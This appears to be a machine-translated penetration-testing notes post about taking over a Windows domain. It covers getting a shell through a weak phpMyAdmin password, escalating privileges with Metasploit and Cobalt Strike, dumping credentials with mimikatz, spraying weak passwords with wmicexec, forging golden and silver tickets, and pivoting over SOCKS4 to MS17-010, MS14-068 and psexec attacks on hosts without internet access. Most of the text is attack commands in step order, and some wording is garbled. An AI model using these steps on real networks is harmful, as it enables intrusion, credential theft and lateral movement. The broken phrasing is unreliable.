Article Directory
Preface
In the process of penetration testing, after taking down a host in the domain, sometimes other hosts in the intranet have a network, sometimes there is no network. At this time, if there is a network, we can follow the regular penetration test. If there is no network, we The host should be used as a springboard, socks protocol or other methods should be used to communicate with hosts without internet
Hosts in the domain have a network
Attack process
Start the acquisition of domain control authority through the extranet WEB service of the webserver host in the domain environment.
If the webserver authority has been obtained:
0x01:
- Through phpmyadmin weak password getshell
0x02:
- msf generates msf listener getsystem upload'/root/x64' c:\test mimikatz
privilege::debug sekurlsa::logonpasswords
0x03:
- Batch processing wmicexec tests the existence of weak password 29 31 32 IP
0x04:
- Get 29 31 32 permission rebound msf getsystem
0x05
- Batch processing wmicexec test weak password 21 won the bid
- execute -f cmd.exe -H -i 0x06
- Export all hashes for gold and silver notes
Hosts in the domain have no network
Msf
- I took the weserver and found that there are two network segments, 192.168.3.31 192.168.230.131,
assuming 192.168.230.131 is the external network, and 192.168.3.31 is the internal network - It was also discovered that no other hosts on the intranet were connected to the Internet, only the webserver was connected.
- At this point, you can use webserver as a springboard, open socks with cs, and use msf
Operating procedures
#cobalt strike
- Start, monitor, generate, go online, escalate rights
- cs starts socks4 to generate a springboard for listening ports, and setg Proxies
- socks4:192.168.230.133:xxxxx copied to msf
msfconsole
- Load proxy: setg Proxies socks4:192.168.230.133:xxxxx
- Attack modules: ms17010 ms14068 smb psexec, etc.
- use exploit/windows/smb/psexec
#Bind yourself to achieve a netless probe
- set payload bind_tcp
- set smbuser administrator
- set smbpass admin!@#45
- Upload mimikatz: upload'/root/x64' c:\test
- mimikatz privilege::debug sekurlsa::logonpasswords